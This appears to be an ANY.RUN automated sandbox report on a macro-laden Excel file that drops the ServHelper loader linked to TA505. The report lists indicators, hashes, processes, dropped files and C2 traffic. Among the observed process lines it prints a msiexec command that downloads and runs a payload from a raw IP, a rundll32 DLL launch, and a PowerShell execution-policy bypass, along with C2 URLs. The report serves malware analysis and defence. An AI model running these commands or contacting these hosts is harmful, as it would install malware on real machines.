analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

120419_001_18091121.xls

Full analysis: https://app.any.run/tasks/cb22d01e-10d6-4bfd-bc4a-ad1bbd0c3d25
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 14:29:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
trojan
servhelper
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Fri Apr 12 09:04:44 2019, Security: 0
MD5:

594C7FED7F9175CCFA1A4C6C7CCCD633

SHA1:

9F1436FA9CC1656842C7E8617360E4AF0B939C03

SHA256:

C8A81B053145DADF0DBD847068C949E30ED48B9DE32D92A6FA7F045E617C4BFB

SSDEEP:

3072:pKpb8rGYrMPelwhKmFV5xtezEsgrdgcZB7QB9oZX0gBByVyrrpUQjeKgfapLEsYV:pKpb8rGYrMPelwhKmFV5xtuEsgrdg0El

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 3072)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3072)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 928)
    • Application was dropped or rewritten from another process

      • nsD126.tmp (PID: 4036)
    • Downloads executable files from IP

      • msiexec.exe (PID: 2144)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2144)
    • Connects to CnC server

      • rundll32.exe (PID: 928)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1244)
    • SERVHELPER was detected

      • rundll32.exe (PID: 928)
    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 3360)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2144)
      • MSID08A.tmp (PID: 2404)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2144)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 1032)
    • Starts application with an unusual extension

      • MSID08A.tmp (PID: 2404)
    • Starts CMD.EXE for commands execution

      • nsD126.tmp (PID: 4036)
      • rundll32.exe (PID: 928)
    • Creates files in the user directory

      • powershell.exe (PID: 3796)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3072)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2144)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2144)
    • Loads dropped or rewritten executable

      • MSID08A.tmp (PID: 2404)
    • Application was dropped or rewritten from another process

      • MSID08A.tmp (PID: 2404)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Листы
  • 1
  • Макросы Excel 4.0
  • 1
TitleOfParts:
  • 1
  • 2
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:04:12 08:04:44
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
13
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs msid08a.tmp nsd126.tmp no specs cmd.exe no specs #SERVHELPER rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3072"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2536msiexec.exe RETURN=801 /i http://91.201.67.96/cyf /q ksw='%TMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2144C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1780msiexec.exe RETURN=801 /i http://91.201.67.96/cyf /q ksw='%TMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2404"C:\Windows\Installer\MSID08A.tmp"C:\Windows\Installer\MSID08A.tmp
msiexec.exe
User:
admin
Company:
pegas
Integrity Level:
MEDIUM
Description:
pegas Application
Version:
1.0.2.1
4036"C:\Users\admin\AppData\Local\Temp\nsrD115.tmp\nsD126.tmp" "cmd.exe" /c rundll32 C:\Users\admin\AppData\Local\Temp\pegas.dll, kestC:\Users\admin\AppData\Local\Temp\nsrD115.tmp\nsD126.tmpMSID08A.tmp
User:
admin
Integrity Level:
MEDIUM
1032"cmd.exe" /c rundll32 C:\Users\admin\AppData\Local\Temp\pegas.dll, kestC:\Windows\system32\cmd.exensD126.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
928rundll32 C:\Users\admin\AppData\Local\Temp\pegas.dll, kestC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1244cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294770688
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3796powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294770688
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 063
Read events
953
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
4
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
3072EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR63BD.tmp.cvr
MD5:
SHA256:
2144msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF4D504EE157FCEE1C.TMP
MD5:
SHA256:
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ZHHZTF6E1LQBCDVQT2Y.temp
MD5:
SHA256:
2144msiexec.exeC:\Windows\Installer\12cf6f.ipibinary
MD5:E2F4224DEE6511A1B9F1060B7E5CC036
SHA256:9360CB356F6F64564D384E43DC4146327B829579C2928E730CE9C5FB371AD7AC
2144msiexec.exeC:\Windows\Installer\MSID08A.tmpexecutable
MD5:4CA90E372982C864B8EAE6D95161A213
SHA256:843578299D9E60E52F781CA487AA83F5DF4C5F4CA71D3A941A8EA249476C5C3C
2144msiexec.exeC:\Windows\Installer\MSICFDC.tmpbinary
MD5:12B6F97DF12098DC867B18A1D91685E7
SHA256:04C045CB5752434199D133AD6CAA92325013BE71257050ED6A236B74053A6406
2144msiexec.exeC:\Windows\Installer\MSICD2B.tmpexecutable
MD5:2C0B36A448FE7131CFB4FBC1A960DA2B
SHA256:75708412609376B75E821D0D200BA6AEC495B80629C7293D0BD1C9484C0F1C36
2144msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:8B109A4197310533EFAB478B2EAD811E
SHA256:A9C90142CE82F5EEB730DFAA7133CBAA43C6DF23BE806754673CE8E2C0875307
2404MSID08A.tmpC:\Users\admin\AppData\Local\Temp\pegas.dllexecutable
MD5:4A8198FCA604A78DD210803AEBD5CBBA
SHA256:9DC1381816B8B18AEAD256BDC05486171968ABBC6FF01766088FBFE7BADD194E
3796powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2144
msiexec.exe
GET
200
91.201.67.96:80
http://91.201.67.96/cyf
unknown
executable
372 Kb
suspicious
928
rundll32.exe
POST
200
37.252.9.143:80
http://joisff333.icu/jquery/jquery.php
DE
text
22 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2144
msiexec.exe
91.201.67.96:80
suspicious
928
rundll32.exe
37.252.9.143:80
joisff333.icu
DE
malicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared
joisff333.icu
  • 37.252.9.143
malicious

Threats

PID
Process
Class
Message
2144
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
2144
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
928
rundll32.exe
A Network Trojan was detected
ET TROJAN ServHelper CnC Inital Checkin
928
rundll32.exe
A Network Trojan was detected
MALWARE [PTsecurity] ServHelper (TA505)
928
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
928
rundll32.exe
A Network Trojan was detected
MALWARE [PTsecurity] ServHelper Shell command (TA505)
1 ETPRO signatures available at the full report
No debug info